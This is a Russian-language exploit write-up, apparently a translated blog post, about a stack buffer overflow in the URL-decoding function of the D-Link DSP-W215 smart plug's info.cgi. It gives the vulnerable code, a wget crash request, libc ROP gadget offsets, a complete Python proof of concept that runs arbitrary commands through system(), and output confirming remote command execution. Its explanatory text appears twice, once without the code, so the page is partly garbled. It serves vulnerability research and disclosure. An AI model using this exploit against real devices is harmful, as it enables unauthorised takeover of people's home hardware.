Вот мы снова и опять.
В последнем эксплоите к DSP-W215 я говорил, чтобы функция get_input_entries не падала, нужно использовать имя «storage_path» в POST-запросе. Так нужно было сделать из-за того, что есть еще одно переполнение буфера, на этот раз в функции get_input_entries, которую вызывает get_input_entries, если имя пост параметра отлично от «storage_path» или «path»:
В функцию replace_special_char передается один аргумент — указатель на обрабатываемое POST-значение:
Эта функция занимается декодированием URL:
Чтобы декодировать URL, функция получает длину строки POST-значения, которую передает get_input_entries:
post_value_length = strlen(post_data);
И совершает цикл через все байты post_value_length:
На каждой итерации, функция сохраняет один раскодированный (urldecoded) байт, или, если декодирование не требовалось, исходный байт POST-значения в локальную переменную decode_buf на стеке:
По сути, делает вот это:
Если мы посмотрим на стек replace_special_char, мы увидим, что POST-значение длиной больше, чем 612 байт, переполнит весь стек до первого сохраненного регистра ($s0), а еще 36 байт переполнят сохраненный адрес возврата ($ra).
$ra = 0×42424242
Из-за того, что декодирующий цикл использует strlen для определения необходимого количества байтдля копирования в decode_buf, мы должны помнить об ограничении на использование NULL-байта в POST-запросе. Это значит, что адрес возврата, который мы использовали в предыдущих эксплоитах, не будет работать, т.к. он запрос содержит NULL-байт, но мы можем выполнить ROP в libc для достижения такого же эффекта.
Внутри libc, по смещению 0xBA50, находится gadget, который указывает на регистр $a1 на стеке (на $sp+0xB8, если быть точным), а затем прыгает на какой-то адрес, который он получает из регистра $s1:
Первый ROP gadget
Если мы перезапишем $s1 адресом со смещением 0×34640 во время переполнения буфера, то выполнение программы перепрыгнет на следующий gadget, который положит регистр $a1 в $a0 (регистр с первым аргументом функции) и вызовет функцию, адрес которой находится в $s0:
Второй ROP gadget
Итак, мы убедились, что $s0 указывает на функцию system() (по смещению 0x4BC80 в libc), значит, мы можем вызвать system() с указателем на стек:
После добавления базового адреса libc (0x2AB61000) ко всем смещениям, мы можем написать и протестировать PoC для этой уязвимости:
Как и ранее, мы можем выполнять любые команды и получать ответ:
В последнем эксплоите к DSP-W215 я говорил, чтобы функция get_input_entries не падала, нужно использовать имя «storage_path» в POST-запросе. Так нужно было сделать из-за того, что есть еще одно переполнение буфера, на этот раз в функции get_input_entries, которую вызывает get_input_entries, если имя пост параметра отлично от «storage_path» или «path»:
В функцию replace_special_char передается один аргумент — указатель на обрабатываемое POST-значение:
Эта функция занимается декодированием URL:
Чтобы декодировать URL, функция получает длину строки POST-значения, которую передает get_input_entries:
post_value_length = strlen(post_data);
И совершает цикл через все байты post_value_length:
На каждой итерации, функция сохраняет один раскодированный (urldecoded) байт, или, если декодирование не требовалось, исходный байт POST-значения в локальную переменную decode_buf на стеке:
По сути, делает вот это:
void replace_special_char(char *post_data)
{
char decode_buf[0x258];
int post_value_length, i = 0, j = 0;
memset(decode_buf, 0, sizeof(decode_buf));
post_value_length = strlen(post_data);
while(i < post_value_length)
{
/*
* ...
* If post_data[i] == '%', then it's URL encoded; try to decode it here
* (as long as the POST data isn't URL encoded, this code does nothing,
* so it's not shown).
* ...
*/
// No bounds checking on index j!
decode_buf[j] = post_data[i];
j++;
i++;
}
...
return;
}Если мы посмотрим на стек replace_special_char, мы увидим, что POST-значение длиной больше, чем 612 байт, переполнит весь стек до первого сохраненного регистра ($s0), а еще 36 байт переполнят сохраненный адрес возврата ($ra).
# Overflow $ra with 0x42424242
wget --post-data="foo=$(perl -e 'print "A"x648; print "B"x4')" http://192.168.0.60/common/info.cgi$ra = 0×42424242
Из-за того, что декодирующий цикл использует strlen для определения необходимого количества байтдля копирования в decode_buf, мы должны помнить об ограничении на использование NULL-байта в POST-запросе. Это значит, что адрес возврата, который мы использовали в предыдущих эксплоитах, не будет работать, т.к. он запрос содержит NULL-байт, но мы можем выполнить ROP в libc для достижения такого же эффекта.
Внутри libc, по смещению 0xBA50, находится gadget, который указывает на регистр $a1 на стеке (на $sp+0xB8, если быть точным), а затем прыгает на какой-то адрес, который он получает из регистра $s1:
Первый ROP gadget
Если мы перезапишем $s1 адресом со смещением 0×34640 во время переполнения буфера, то выполнение программы перепрыгнет на следующий gadget, который положит регистр $a1 в $a0 (регистр с первым аргументом функции) и вызовет функцию, адрес которой находится в $s0:
Второй ROP gadget
Итак, мы убедились, что $s0 указывает на функцию system() (по смещению 0x4BC80 в libc), значит, мы можем вызвать system() с указателем на стек:
system($sp+0xB8);После добавления базового адреса libc (0x2AB61000) ко всем смещениям, мы можем написать и протестировать PoC для этой уязвимости:
#!/usr/bin/env python
# Exploits overflow in replace_special_char.
import sys
import urllib2
try:
target = sys.argv[1]
command = sys.argv[2]
except:
print "Usage: %s <target> <command>" % sys.argv[0]
sys.exit(1)
url = "http://%s/common/info.cgi" % target
buf = "foo=" # POST parameter name can be anything
buf += "E" * 612 # Stack filler
buf += "\x2A\xBA\xCC\x80" # $s0, address of system()
buf += "\x2A\xB9\x56\x40" # $s1, address of ROP2
buf += "F" * 4 # $s2, don't care
buf += "F" * 4 # $s3, address of ROP2
buf += "F" * 4 # $s4, don't care
buf += "F" * 4 # $s5, address of ROP3
buf += "F" * 4 # $s6, don't care
buf += "F" * 4 # $s7, don't care
buf += "F" * 4 # $fp, don't care
buf += "\x2A\xB6\xCA\x50" # $ra, address of ROP1
buf += "G" * 0xB8 # Stack filler
buf += command # Command to execute
req = urllib2.Request(url, buf)
print urllib2.urlopen(req).read()Как и ранее, мы можем выполнять любые команды и получать ответ:
$ ./exploit2.py 192.168.0.60 'ls -l /'
drwxr-xr-x 2 1000 1000 4096 May 16 09:01 bin
drwxrwxr-x 3 1000 1000 4096 May 22 18:03 dev
drwxrwxr-x 3 1000 1000 4096 Sep 3 2010 etc
drwxrwxr-x 3 1000 1000 4096 May 16 09:01 lib
drwxr-xr-x 3 1000 1000 4096 May 16 09:01 libexec
lrwxrwxrwx 1 1000 1000 11 May 17 15:20 linuxrc -> bin/busybox
drwxrwxr-x 2 1000 1000 4096 Nov 11 2008 lost+found
drwxrwxr-x 6 1000 1000 4096 May 17 15:15 mnt
drwxr-xr-x 2 1000 1000 4096 May 16 09:01 mydlink
drwxrwxr-x 2 1000 1000 4096 Nov 11 2008 proc
drwxrwxr-x 2 1000 1000 4096 May 17 17:23 root
drwxr-xr-x 2 1000 1000 4096 May 16 09:01 sbin
drwxrwxrwx 3 1000 1000 4096 May 22 19:18 tmp
drwxrwxr-x 7 1000 1000 4096 May 16 09:01 usr
drwxrwxr-x 3 1000 1000 4096 May 17 15:21 var
-rw-r--r-- 1 1000 1000 17 May 16 09:01 version
drwxrwxr-x 6 1000 1000 4096 May 22 17:15 www